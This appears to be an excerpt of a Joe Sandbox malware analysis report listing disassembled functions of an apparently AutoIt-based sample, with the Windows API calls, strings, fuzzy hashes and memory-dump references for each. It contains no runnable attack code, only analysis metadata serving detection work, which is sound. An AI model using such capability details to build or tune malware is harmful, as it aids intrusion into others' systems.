Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: c5c0696c54b35eec2949b0fc7af64880e70ef34d247a940dd59ecd0f7f5638d7
Instruction ID: 63ec485facdb1942604f0a0229a681d77479080c1e0dec92466615654d4b6a1a
Opcode Fuzzy Hash: c5c0696c54b35eec2949b0fc7af64880e70ef34d247a940dd59ecd0f7f5638d7
Instruction Fuzzy Hash: 09915571600211AFDB14DF64D885B6ABBE8FF48710F20856EF90ADB291DB71E841DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F3B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE436A: _wcscpy.LIBCMT ref: 00EE438D

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

__wcsnicmp.LIBCMT ref: 00F3B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F3B739

Strings

LPT, xrefs: 00F3B66A

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 3184ef3ed01dd113c1e7b20c4afb9cbd3216f3aa370e12c79705678e913527d1
Instruction ID: b8bb102f8d9f33c313469d00cf118db497f414e4892f01475b515766cf4b5d49
Opcode Fuzzy Hash: 3184ef3ed01dd113c1e7b20c4afb9cbd3216f3aa370e12c79705678e913527d1
Instruction Fuzzy Hash: 71617476E00219AFCB14DF54C895EAEB7F5EF48320F14405AFA46AB391D770AE41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F17190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F17237
_memmove.LIBCMT ref: 00F17291

Strings

#V, xrefs: 00F1730B, 00F1CAB3, 00F1CACF

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove
String ID: #V
API String ID: 4104443479-3658881132
Opcode ID: c702c3a866a04ff7360501632ee284d4fa54be191041c843fe769b96cbe653a9
Instruction ID: c9e325a55d1d420c95fcd4acd532b4ed60a3eddd8eb1256584e569f7d6ef4239
Opcode Fuzzy Hash: c702c3a866a04ff7360501632ee284d4fa54be191041c843fe769b96cbe653a9
Instruction Fuzzy Hash: 1F516E70D00609DFCB25DFA8C890AEEBBB1FF44314F24452AE85AE7250E731A995DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00EDE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00EDE01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00EDE037

Strings

@, xrefs: 00EDE02B

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 73c7a93bbc29fed470c34c8312c4078c8e0b55f78d936dbd18eca422961b02a3
Instruction ID: ff9ea84634177689f02a2f2937962eddaa228bfe26bfcfd8155556a67ddc4368
Opcode Fuzzy Hash: 73c7a93bbc29fed470c34c8312c4078c8e0b55f78d936dbd18eca422961b02a3
Instruction Fuzzy Hash: 3E517AB14087489BE320AF14EC85BAFB7F8FF94714F41485EF1D851291DB719469CB16

Uniqueness

Uniqueness Score: -1.00%

Function 00F39CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00EE4AB2: __fread_nolock.LIBCMT ref: 00EE4AD0

_wcscmp.LIBCMT ref: 00F39DE1
_wcscmp.LIBCMT ref: 00F39DF4

Strings

FILE, xrefs: 00F39D2D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: dba18ae3a83513cf93b3ca99e618dd6362292a4fa53d2955cb4ca662622d4da0
Instruction ID: 54d8bcdd9528c630c6c4310bf586dd9f3609b5aba534e5b4ff171604ae6ed4c6
Opcode Fuzzy Hash: dba18ae3a83513cf93b3ca99e618dd6362292a4fa53d2955cb4ca662622d4da0
Instruction Fuzzy Hash: B941E772A4420ABADF20EAA5CC46FEF77FDDF45720F00447AFA04B7180E6B199449B65

Uniqueness

Uniqueness Score: -1.00%

Function 00F58096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00F58186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F5819B

Strings

', xrefs: 00F580EF

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: b4ee6bbd6328094910762ed25c39955e67b6ab8e33e9d3d32f41d285eded00f8
Instruction ID: afb5db858aa29d76f9b6951290f480c23409e1dc452397dd27fc1f20a8bd0546
Opcode Fuzzy Hash: b4ee6bbd6328094910762ed25c39955e67b6ab8e33e9d3d32f41d285eded00f8
Instruction Fuzzy Hash: 21412874A007099FDB10CF64C881BDA7BB5FB08341F10006AEE05EB392DB71A946DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F42C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F42C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F42CA0

Strings

|, xrefs: 00F42C71

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 8247d1d6a1d63973c8926cf73388df023ef3a74a396e7cc90c522a3d5fb24087
Instruction ID: 568fe9004e86fd0b073e138fc9aa618e627d947c09fe5e4a7e41e63998aa66a4
Opcode Fuzzy Hash: 8247d1d6a1d63973c8926cf73388df023ef3a74a396e7cc90c522a3d5fb24087
Instruction Fuzzy Hash: BB311771C00219ABCF01EFA1DC85AEEBFB9FF08350F100069FD15A6262EB315956DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F57088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00F5713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F57178

Strings

static, xrefs: 00F570D8

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 8bf56306261cb76c50b3b5f7232bb0770e749966928d6dc7d1c0ed6651cf2935
Instruction ID: db3dc976797b49db4a53a3d2fdbebef0bcc5e4e248f565eff92fa6ebe4cc04b0
Opcode Fuzzy Hash: 8bf56306261cb76c50b3b5f7232bb0770e749966928d6dc7d1c0ed6651cf2935
Instruction Fuzzy Hash: 0331AF71100604AEDB11AF78DC80EFB73A9FF48720F109619FEA597191DB31AC85EB64

Uniqueness

Uniqueness Score: -1.00%

Function 00F33049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F330B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F330F3

Strings

0, xrefs: 00F330B1

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a41221b714fc3e541d71bae6f9204da7128ee0b06ea733b2a7fb8452e353f7be
Instruction ID: 6f4da483991d92c258ea371654cc7ec2d2f72122f7e82dcd0d7abb8e6828898c
Opcode Fuzzy Hash: a41221b714fc3e541d71bae6f9204da7128ee0b06ea733b2a7fb8452e353f7be
Instruction Fuzzy Hash: 6B31D632E00309EBEB24EF58C885BAFBBF9EF05370F144019E985A61A1D7709B44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F440B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00F44132

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00F44124
, $, xrefs: 00F44172

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 91654fe769fbfa7dc9c9ede61867f6df60f4cc27bdb52287fb1b105ce16e8be8
Instruction ID: 37dc0af19a063a2af7148c50a380506444082ef3a7b95b766f93b6f688ae8491
Opcode Fuzzy Hash: 91654fe769fbfa7dc9c9ede61867f6df60f4cc27bdb52287fb1b105ce16e8be8
Instruction Fuzzy Hash: E321AE31A0021CABCF01EF64C881FAE7BA5EF94340F000499F904F7242DB34E985EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F56CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F56D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F56D91

Strings

Combobox, xrefs: 00F56D53

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 257a8224d32696fe176ca295c37573331d5cde968346c744a608fed1579ae2e1
Instruction ID: b7dcbdcf77c5e37826449d67dd4e3fa3afab3ccba9a5a68eb0cce846367f5087
Opcode Fuzzy Hash: 257a8224d32696fe176ca295c37573331d5cde968346c744a608fed1579ae2e1
Instruction Fuzzy Hash: 9B11D071700208AFEF119F54DC80EAB3B6AEB843A5F504529FE24DB290D6719C50A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F5722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00ED2111: CreateWindowExW.USER32 ref: 00ED214F
Part of subcall function 00ED2111: GetStockObject.GDI32(00000011), ref: 00ED2163
Part of subcall function 00ED2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED216D

GetWindowRect.USER32 ref: 00F57296
GetSysColor.USER32(00000012), ref: 00F572B0

Strings

static, xrefs: 00F57273

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 7d8973ea29da5e621a3429ab9784bf92f81e9e86251f90a04d620494d837f753
Instruction ID: 287d1d35cedf00aed3b9b3a86cf6d770f270a60b6d558fc80e4ee221e8c4d06d
Opcode Fuzzy Hash: 7d8973ea29da5e621a3429ab9784bf92f81e9e86251f90a04d620494d837f753
Instruction Fuzzy Hash: 60215972A1420AAFDB04DFB8DC45EFA7BA8EB08315F104519FE55D3240DB75E851EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F56F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00F56FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F56FD6

Strings

edit, xrefs: 00F56FAB

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: d3a259c877788a580215974e4e59bac6c9000b8b935e061b3d9aca3263724347
Instruction ID: f97b37ac99ed782faa4536a4aacc8965282d726d1f4f683e46e5148325fef210
Opcode Fuzzy Hash: d3a259c877788a580215974e4e59bac6c9000b8b935e061b3d9aca3263724347
Instruction Fuzzy Hash: 83119D71900208ABEB104E64EC80EAB3BA9EB04379FA04714FE30D31E0DB75DC54BB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F33156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F331C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F331E8

Strings

0, xrefs: 00F331BF

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 70ce45faa463c6e7bb5355bfb981ce0589b2513abab7a6a4dcdbe69467213a19
Instruction ID: 5a17c541160b94627944221147bd029bf7564a068003c7244f9f7bb38a3fb260
Opcode Fuzzy Hash: 70ce45faa463c6e7bb5355bfb981ce0589b2513abab7a6a4dcdbe69467213a19
Instruction Fuzzy Hash: 73112B32D10218ABDB20FB98DC45B9D77B8AB05730F140222ED15A72A0D774EF05FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F428A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F428F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F42921

Strings

<local>, xrefs: 00F428E9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 50a6c30877fa012e4f984b879533da933fd3e8183b83304ea12cecad5cdb4304
Instruction ID: 8183320e0efd269a38cda57f1ad6c08058af3ed7e63198949d12f5569378bd5b
Opcode Fuzzy Hash: 50a6c30877fa012e4f984b879533da933fd3e8183b83304ea12cecad5cdb4304
Instruction Fuzzy Hash: 9B11CE71901226BAEB648B518C88EBBBFACEF05361F50813BF91582000E7B06994F6F0

Uniqueness

Uniqueness Score: -1.00%

Function 00F48475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F486E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00F4849D,?,00000000,?,?), ref: 00F486F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F484A0
htons.WSOCK32(00000000,?,00000000), ref: 00F484DD

Strings

255.255.255.255, xrefs: 00F484B8

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: d463a933c021031fac85c4c82c0e8eb5e4aa0577f7ce6836f17eabf05f70d4b1
Instruction ID: 3b16c6c5f0d74033d8ea68c3b2a48b77b456357cde1b8d9565e6e047cc91c74b
Opcode Fuzzy Hash: d463a933c021031fac85c4c82c0e8eb5e4aa0577f7ce6836f17eabf05f70d4b1
Instruction Fuzzy Hash: 3311E53150021AABCB10EF64DC42FBEB764FF00360F204556FD21A72D1DB71A811E755

Uniqueness

Uniqueness Score: -1.00%

Function 00F299BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F29A2B

Strings

ListBox, xrefs: 00F299F5
ComboBox, xrefs: 00F299CA

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: fc85cd653b396f9b388709ce744c5b1df5fcb7065e8c653876d044208956f8ec
Instruction ID: f4dd95115e19778c7c53059b39fe9b2033182adb7eb12229584d3fadeee8bc7f
Opcode Fuzzy Hash: fc85cd653b396f9b388709ce744c5b1df5fcb7065e8c653876d044208956f8ec
Instruction Fuzzy Hash: CF012871A41229AB8B14EBA4CC52DFEB3A9EF52320F100619F871A72C1EE745848A760

Uniqueness

Uniqueness Score: -1.00%

Function 00F3934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F39367
__fread_nolock.LIBCMT ref: 00F3937C

Strings

EA06, xrefs: 00F393AE

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 299883ae2549c29633254964e42d2720d2462478e664680cc6feb1415e07a5f4
Instruction ID: 18fe9d1bdbd4aba89fadf70f4841d80b1dca8067a62dab79d2d65c51fbc4c28b
Opcode Fuzzy Hash: 299883ae2549c29633254964e42d2720d2462478e664680cc6feb1415e07a5f4
Instruction Fuzzy Hash: 4501B97290425C7EDB18CAA8C856EFE7BFC9B15311F00419AF652D2181E5B5E6089760

Uniqueness

Uniqueness Score: -1.00%

Function 00F298B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00F29923

Strings

ListBox, xrefs: 00F298ED
ComboBox, xrefs: 00F298C2

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
